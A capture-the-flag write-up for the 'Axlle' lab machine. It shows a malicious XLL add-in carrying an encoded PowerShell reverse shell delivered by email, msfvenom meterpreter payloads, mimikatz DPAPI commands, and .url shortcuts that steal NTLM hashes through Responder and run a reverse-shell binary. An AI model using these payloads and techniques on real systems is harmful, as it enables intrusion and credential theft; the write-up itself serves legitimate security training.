Axxle

Recon

nmap_scan.log

On http webapp we see accounts@axlle.htb email, add it to /etc/hosts

└─$ grep axl /etc/hosts
10.10.11.21     axlle.htb       mainframe.axlle.htb     hostmaster.axlle.htb

DNS (53)

└─$ dig any axlle.htb @10.10.11.21

; <<>> DiG 9.19.21-1-Debian <<>> any axlle.htb @10.10.11.21
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9957
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 4

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;axlle.htb.                     IN      ANY

;; ANSWER SECTION:
axlle.htb.              600     IN      A       10.10.11.21
axlle.htb.              3600    IN      NS      mainframe.axlle.htb.
axlle.htb.              3600    IN      SOA     mainframe.axlle.htb. hostmaster.axlle.htb. 261 900 600 86400 3600
axlle.htb.              600     IN      AAAA    dead:beef::aa32:c39e:cbe5:7d67
axlle.htb.              600     IN      AAAA    dead:beef::1de

;; ADDITIONAL SECTION:
mainframe.axlle.htb.    3600    IN      A       10.10.11.21
mainframe.axlle.htb.    3600    IN      AAAA    dead:beef::1de
mainframe.axlle.htb.    3600    IN      AAAA    dead:beef::aa32:c39e:cbe5:7d67

;; Query time: 159 msec
;; SERVER: 10.10.11.21#53(10.10.11.21) (TCP)
;; WHEN: Sun Jun 23 04:54:41 EDT 2024
;; MSG SIZE  rcvd: 253

SMB

We are not able to enumerate the smb via null or default usernames.

└─$ addr=axlle.htb; enum4linux "$addr" | tee enum4linux.log
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 23 05:02:41 2024

 =========================================( Target Information )=========================================

Target ........... axlle.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =============================( Enumerating Workgroup/Domain on axlle.htb )=============================

[E] Can't find workgroup/domain

 =================================( Nbtstat Information for axlle.htb )=================================

Looking up status of 10.10.11.21
No reply from 10.10.11.21

 =====================================( Session Check on axlle.htb )=====================================

[+] Server axlle.htb allows sessions using username '', password ''

 ==================================( Getting domain SID for axlle.htb )==================================

Domain Name: AXLLE
Domain Sid: S-1-5-21-1005535646-190407494-3473065389

[+] Host is part of a domain (not a workgroup)

 ====================================( OS information on axlle.htb )====================================

[E] Can't get OS info with smbclient


[+] Got OS info for axlle.htb from srvinfo: 
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 =========================================( Users on axlle.htb )=========================================

[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ===================================( Share Enumeration on axlle.htb )===================================

do_connect: Connection to axlle.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on axlle.htb

 =============================( Password Policy Information for axlle.htb )=============================


[E] Unexpected error from polenum:

[+] Attaching to axlle.htb using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:AXLLE.HTB)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[E] Failed to get password policy with rpcclient

 ========================================( Groups on axlle.htb )========================================

[+] Getting builtin groups:

[+]  Getting builtin group memberships:

[+]  Getting local groups:

[+]  Getting local group memberships:

[+]  Getting domain groups:

[+]  Getting domain group memberships:

 ====================( Users on axlle.htb via RID cycling (RIDS: 500-550,1000-1050) )====================

[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 =================================( Getting printer info for axlle.htb )=================================

Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT

enum4linux complete on Sun Jun 23 05:06:34 2024

HTTP (80)

Writeup.png

Backend is IIS webserver.

Writeup-1.png

└─$ curl http://axlle.htb/ -I
HTTP/1.1 200 OK
...
Server: Microsoft-IIS/10.0
Date: Sun, 23 Jun 2024 08:48:27 GMT 

Excel

Reading:

• https://rileykidd.com/2017/08/03/application-whitelist-bypass-using-XLL-and-embedded-shellcode/

• https://medium.com/csg-govtech/uncommon-office-malware-stagers-dad49a8f2054

It looks like we can only send Excel documents but they may not contain macros.

Writeup-2.png

I was first using https://github.com/0xflagplz/Xll-Payload-Generator tool to generate

Testing stage:

└─$ msfvenom --platform windows --arch x64  -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -b '\x00\x0A\x0D' -f raw -o test.bin
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 319 (iteration=0)
x64/xor chosen with final size 319
Payload size: 319 bytes
Saved as: test.bin
## Credits: https://stackoverflow.com/a/72784177

The testing stage worked, yay! Then I experimented on connection and it worked!

└─$ msfvenom --platform windows --arch x64  -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.75 LPORT=4444 EXITFUNC=thread -b '\x00\x0A\x0D' -f raw -o shell.bin
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor failed with A key could not be found for the XOR Encoder encoder.
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 202552 (iteration=0)
x64/xor_dynamic chosen with final size 202552
Payload size: 202552 bytes
Saved as: shell.bin

But when I was sending the email to the user I was getting nothing back!

## Windows
➜ mkdir temp; py .\XllGen.py -i .\shell.bin -o shell.xll

    Directory: ~\VBoxShare\Xll-Payload-Generator
    
                                @achocolatechippancake
                                            @bobby4111

Successfully wrote unencrypted data to 'temp/main.cpp'
Generated code saved to 'temp/main.cpp'
Templates written to 'temp'
Successfully compiled to 'shell.xll'
Cleanup: 'temp' folder and its contents removed successfully.
---
## Linux
└─$ swaks --to accounts@axlle.htb --from pwn@axlle.htb --header "Subject: Cat pictures" --body "uwu" --attach @./shell.xll

After some trial and error other tool was suggested to use https://github.com/moohax/xllpoc. Clone the project, download shit ton of c++ stuff, with sdk, edit XLL_POC.cpp

##include "stdafx.h"
##include <cstdlib>
##include <fstream>
##include <iostream>

short __stdcall xlAutoOpen()
{
	system("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA1ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==");
	return 0;
}

The project generates XLL_POC.dll which you should rename to XLL_POC.xll, since xll files are essentially dll files...

Reverse Shell (gideon.hamill)

PS C:\> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
axlle\gideon.hamill S-1-5-21-1005535646-190407494-3473065389-1113


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users              Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
AXLLE\Accounts                             Group            S-1-5-21-1005535646-190407494-3473065389-1104 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees                            Group            S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Upgrade shell with ConPtyShell for more stability and run winpeas to enumerate the system.

...
╔══════════╣ UAC Status
╚ If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy:
    FilterAdministratorToken:
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
      [-] Only the RID-500 local admin account can be used for lateral movement.

╔══════════╣ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.20348.1
    PowerShell Core Version:
    Transcription Settings:
    Module Logging Settings:
    Scriptblock Logging Settings:
    PS history file: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 319B
...
╔══════════╣ Drives Information
╚ Remember that you should search more info inside the other drives
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 2 GB)(Permissions: Users [AppendData/CreateDirectories])
...
╔══════════╣ Checking KrbRelayUp
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
  The system is inside a domain (AXLLE) so it could be vulnerable.
╚ You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
...
╔══════════╣ Home folders found
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\baz.humphries
    C:\Users\brad.shaw : Accounts [AllAccess]
    C:\Users\calum.scott
    C:\Users\dallon.matrix
    C:\Users\dan.kendo
    C:\Users\Default
    C:\Users\Default User
    C:\Users\gideon.hamill : Accounts [AllAccess], gideon.hamill [AllAccess]
    C:\Users\jacob.greeny
    C:\Users\lindsay.richards : Accounts [AllAccess]
    C:\Users\Public : Interactive [WriteData/CreateFiles]
    C:\Users\simon.smalls : Accounts [AllAccess]
    C:\Users\trent.langdon
...
════════════════════════════════════╣ Processes Information ╠════════════════════════════════════

╔══════════╣ Interesting Processes -non Microsoft-
╚ Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
...
    rundll32(8132)[C:\Windows\system32\rundll32.exe]
    Command Line: "C:\Windows\system32\rundll32.exe" c:\windows\system32\ieframe.dll,OpenURL C:\inetpub\testing\priv.url
   =================================================================================================

    xllrunner(2112)[C:\program files\microsoft office\xllrunner\xllrunner.exe] -- POwn: gideon.hamill
    Command Line: "C:\program files\microsoft office\xllrunner\xllrunner.exe" "C:\Program Files (x86)\hMailServer\Data\axlle.htb\Attachments\240620240144597341-XLL_POC_4445.xll"
   =================================================================================================
...
╔══════════╣ Modifiable Services
╚ Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
    LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
    RmSvc: GenericExecute (Start/Stop)
    ConsentUxUserSvc_7b331: GenericExecute (Start/Stop)
    CredentialEnrollmentManagerUserSvc_7b331: GenericExecute (Start/Stop)
    DeviceAssociationBrokerSvc_7b331: GenericExecute (Start/Stop)
    DevicePickerUserSvc_7b331: GenericExecute (Start/Stop)
    DevicesFlowUserSvc_7b331: GenericExecute (Start/Stop)
    PimIndexMaintenanceSvc_7b331: GenericExecute (Start/Stop)
    PrintWorkflowUserSvc_7b331: GenericExecute (Start/Stop)
    UdkUserSvc_7b331: GenericExecute (Start/Stop)
    UnistoreSvc_7b331: GenericExecute (Start/Stop)
    UserDataSvc_7b331: GenericExecute (Start/Stop)
    WpnUserService_7b331: GenericExecute (Start/Stop)
...
╔══════════╣ Autorun Applications
╚ Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
Folder: C:\windows\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
   =================================================================================================

	Folder: C:\windows\system32\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
...
╔══════════╣ Network Shares
    ADMIN$ (Path: C:\Windows)
    C$ (Path: C:\)
    IPC$ (Path: )
    NETLOGON (Path: C:\Windows\SYSVOL\sysvol\axlle.htb\SCRIPTS)
    SYSVOL (Path: C:\Windows\SYSVOL\sysvol)
    WebTesting (Path: C:\inetpub\testing) -- Permissions: AllAccess
...
╔══════════╣ Checking for DPAPI Master Keys
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
    MasterKey: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Protect\S-1-5-21-1005535646-190407494-3473065389-1113\2e7f95b7-6930-479a-8df8-ac59abbd261b
    Accessed: 6/24/2024 3:06:28 AM
    Modified: 6/24/2024 3:06:28 AM
   =================================================================================================

    MasterKey: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Protect\S-1-5-21-1005535646-190407494-3473065389-1113\52d1fa8c-4ee4-4b10-940b-ee2bf2d59939
    Accessed: 1/1/2024 4:15:54 AM
    Modified: 1/1/2024 4:15:54 AM
   =================================================================================================
...
╔══════════╣ Checking for DPAPI Credential Files
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
    CredFile: C:\Users\gideon.hamill\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
    Description: Local Credential Data

    MasterKey: 52d1fa8c-4ee4-4b10-940b-ee2bf2d59939
    Accessed: 1/1/2024 4:15:54 AM
    Modified: 1/1/2024 4:15:54 AM
    Size: 11020
   =================================================================================================
...
╔══════════╣ Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    gideon.hamill::AXLLE:1122334455667788:5a5b49070972a5db7aa3c10b497f7760:010100000000000024aa2a2e1ec6da01eb453b8b74c2d6eb0000000008003000300000000000000001000000002000007497a60d8d2660dd079bf7317352d7a79db9a54158fe4ab254d152e774131d730a00100000000000000000000000000000000000090000000000000000000000
...
════════════════════════════════════╣ File Analysis ╠════════════════════════════════════

╔══════════╣ Found PHP_files Files
File: C:\Program Files (x86)\hMailServer\PHPWebAdmin\config-dist.php
...

winpeas showed useful information for us to explore. First I visited hMailServer. Password may come in handy for something?

PS C:\Program Files (x86)\hMailServer\bin> cat hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=52a1b2a1211e690998e0d2ccb653ff22
[Database]
Type=MSSQLCE
Username=
Password=52abe4d2e16269ddddf7b166218e92d9
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

Command to list the shares:

PS C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5> Get-SmbShare

Name       ScopeName Path                                       Description
----       --------- ----                                       -----------
ADMIN$     *         C:\Windows                                 Remote Admin
C$         *         C:\                                        Default share
IPC$       *                                                    Remote IPC
NETLOGON   *         C:\Windows\SYSVOL\sysvol\axlle.htb\SCRIPTS Logon server share
SYSVOL     *         C:\Windows\SYSVOL\sysvol                   Logon server share
WebTesting *         C:\inetpub\testing

Couldn't get passwor via dpapi cache

mimikatz # dpapi::masterkey /in:.\2e7f95b7-6930-479a-8df8-ac59abbd261b /rpc 
mimikatz # dpapi::masterkey /in:.\52d1fa8c-4ee4-4b10-940b-ee2bf2d59939 /rpc
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:C:\Users\gideon.hamill\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
...
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 00002a46 - 10822
  credUnk0       : 00000000 - 0

  Type           : 00000001 - 1 - generic
  Flags          : 00000000 - 0
  LastWritten    : 1/1/2024 12:15:54 PM
  unkFlagsOrSize : 00000000 - 0
  Persist        : 00000002 - 2 - local_machine
  AttributeCount : 00000020 - 32
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : WindowsLive:target=virtualapp/didlogical
  UnkData        : (null)
  Comment        : PersistedCredential
  TargetAlias    : (null)
  UserName       : 02ibadauxfvernpc
  CredentialBlob :
  Attributes     : 32
...

Enumerate groups:

PS C:\users\public> Get-ADGroup -Properties * -Identity Accounts

CanonicalName                   : axlle.htb/Users/`Accounts`
CN                              : Accounts
Created                         : 1/1/2024 3:34:49 AM
createTimeStamp                 : 1/1/2024 3:34:49 AM
Deleted                         :
Description                     : Account Managers
DisplayName                     : Accounts
DistinguishedName               : CN=Accounts,CN=Users,DC=axlle,DC=htb
dSCorePropagationData           : {1/2/2024 6:35:21 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:06:50 AM, 1/1/2024 8:08:07 AM...}
GroupCategory                   : Security
GroupScope                      : Global
groupType                       : -2147483646
HomePage                        :
instanceType                    : 4
isDeleted                       :
LastKnownParent                 :
ManagedBy                       :
member                          : {CN=Lindsay Richards,DC=axlle,DC=htb, CN=Simon Smalls,DC=axlle,DC=htb, CN=Gideon Hamill,DC=axlle,DC=htb, CN=Brad Shaw,DC=axlle,DC=htb}
MemberOf                        : {CN=Employees,CN=Users,DC=axlle,DC=htb}
Members                         : {CN=Lindsay Richards,DC=axlle,DC=htb, CN=Simon Smalls,DC=axlle,DC=htb, CN=Gideon Hamill,DC=axlle,DC=htb, CN=Brad Shaw,DC=axlle,DC=htb}
Modified                        : 1/2/2024 6:35:21 AM
modifyTimeStamp                 : 1/2/2024 6:35:21 AM
Name                            : Accounts
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass                     : group
ObjectGUID                      : 2eeaf150-6c9d-4cea-944b-109ce7197596
objectSid                       : S-1-5-21-1005535646-190407494-3473065389-1104
ProtectedFromAccidentalDeletion : False
SamAccountName                  : Accounts
sAMAccountType                  : 268435456
sDRightsEffective               : 0
SID                             : S-1-5-21-1005535646-190407494-3473065389-1104
SIDHistory                      : {}
uSNChanged                      : 41252
uSNCreated                      : 12791
whenChanged                     : 1/2/2024 6:35:21 AM
whenCreated                     : 1/1/2024 3:34:49 AM

PS C:\users\public> Get-ADGroup -Properties * -Identity Employees

CanonicalName                   : axlle.htb/Users/Employees
CN                              : Employees
Created                         : 1/1/2024 3:34:49 AM
createTimeStamp                 : 1/1/2024 3:34:49 AM
Deleted                         :
Description                     : Employees of Axlle Corp
DisplayName                     : Employees
DistinguishedName               : CN=Employees,CN=Users,DC=axlle,DC=htb
dSCorePropagationData           : {1/2/2024 6:34:14 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:04:46 AM, 1/1/2024 8:08:07 AM...}
GroupCategory                   : Security
GroupScope                      : Global
groupType                       : -2147483646
HomePage                        :
instanceType                    : 4
isDeleted                       :
LastKnownParent                 :
ManagedBy                       :
member                          : {CN=Web Devs,CN=Users,DC=axlle,DC=htb, CN=App Devs,CN=Users,DC=axlle,DC=htb, CN=Sales,CN=Users,DC=axlle,DC=htb, CN=HR,CN=Users,DC=axlle,DC=htb...}
MemberOf                        : {}
Members                         : {CN=Web Devs,CN=Users,DC=axlle,DC=htb, CN=App Devs,CN=Users,DC=axlle,DC=htb, CN=Sales,CN=Users,DC=axlle,DC=htb, CN=HR,CN=Users,DC=axlle,DC=htb...}
Modified                        : 1/2/2024 6:34:14 AM
modifyTimeStamp                 : 1/2/2024 6:34:14 AM
Name                            : Employees
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass                     : group
ObjectGUID                      : b03a8fbd-02c5-484e-8390-80b9a425818d
objectSid                       : S-1-5-21-1005535646-190407494-3473065389-1103
ProtectedFromAccidentalDeletion : False
SamAccountName                  : Employees
sAMAccountType                  : 268435456
sDRightsEffective               : 0
SID                             : S-1-5-21-1005535646-190407494-3473065389-1103
SIDHistory                      : {}
uSNChanged                      : 41239
uSNCreated                      : 12787
whenChanged                     : 1/2/2024 6:34:14 AM
whenCreated                     : 1/1/2024 3:34:49 AM

We are parts of Accounts and Employees group, accounts seems to be Managers.

List connections and process names:

PS C:\Users\gideon.hamill> Get-NetTCPConnection -State Listen | % { $name=(Get-Process -Id $_.OwningProcess).ProcessName; $_ | Add-Member -MemberType NoteProperty -Name ProcessName -Value $name; $_ } | Format-Table -Property LocalAddress, LocalPort, RemoteAddress, RemotePort, State, ProcessName -AutoSize

Still nothing eye catching....

Privilege Escalation (dallon.matrix)

OSINT Testing

Okay, finally I decided to view where the xll were stored and surprise surprise!

PS C:\Program Files (x86)\hMailServer\Data\axlle.htb> tree /f
Folder PATH listing
Volume serial number is BFF7-F940
C:.
├───accounts
├───Attachments
│       240620241208526673-shell.xll
│
├───dallon.matrix
│   └───2F
│           {2F7523BD-628F-4359-913E-A873FCC59D0F}.eml
│
└───ReviewedAttachments
        240620241205223704-HelloWorldXll.xll
        240620241206194486-HelloWorldXll.xll
        240620241207403860-XLL_POC_4445.xll

PS C:\Program Files (x86)\hMailServer\Data\axlle.htb> cat '.\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml'
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
        by MAINFRAME with ESMTP
        ; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/

Hi everyone,

The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.

We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.

Yours in click-worthy URLs,

The Web Dev Team

Save usernames for later just in case.

└─$ echo 'dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb'| tr ',' '\n' > usernames.tld.txt
└─$ echo 'dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb'| tr ',' '\n' | cut -d '@' -f 1 > usernames.txt

Create the file

PS C:\inetpub\testing> echo "[InternetShortcut]`nURL=\\\\10.10.16.75\\uwu" > test.url

Meanwhile start responder:

└─$ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0
...
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.21
[SMB] NTLMv2-SSP Username : AXLLE\dallon.matrix
[SMB] NTLMv2-SSP Hash     : dallon.matrix::AXLLE:469b53838a03ba79:99AD2B9C699BBD738CBFEC1B4A591C10:010100000000000080E5450494C6DA015DB7361262613D3800000000020008004D0042004D00350001001E00570049004E002D004800500045004C0059004B00440049004B005100580004003400570049004E002D004800500045004C0059004B00440049004B00510058002E004D0042004D0035002E004C004F00430041004C00030014004D0042004D0035002E004C004F00430041004C00050014004D0042004D0035002E004C004F00430041004C000700080080E5450494C6DA01060004000200000008003000300000000000000001000000002000000A92CA5BDC9AC41ECE605A1D1836CDEC16A3AEA9A3BBE994E3B82559236ACFFB0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00370035000000000000000000
[*] Skipping previously captured hash for AXLLE\dallon.matrix
[*] Skipping previously captured hash for AXLLE\dallon.matrix
...

User.txt

Well hash couldn't be cracked with rockyou. Turns out you can also open files with file:// protocol, so let's get a reverse shell:

PS C:\inetpub\testing> echo "[InternetShortcut]`nURL=file:///Users/Public/rev.exe" > test.url
---
meterpreter > getuid
Server username: AXLLE\dallon.matrix
meterpreter > shell
Process 4372 created.
Channel 2 created.
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.

C:\>cd %USERPROFILE%
C:\Users\dallon.matrix>tree /f
tree /f
Folder PATH listing
Volume serial number is BFF7-F940
C:.
+---Desktop
       user.txt
C:\Users\dallon.matrix>type .\Desktop\user.txt
d25c2eb60aa5df291c86f643086c4b87

Privilege Escalation (jacob.greeny)

The user is part of Web Devs which means we should have access to some development features.

C:\Users\dallon.matrix>whoami /all
User Name           SID
=================== =============================================
axlle\dallon.matrix S-1-5-21-1005535646-190407494-3473065389-1125

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users              Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
AXLLE\Web Devs                             Group            S-1-5-21-1005535646-190407494-3473065389-1127 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees                            Group            S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
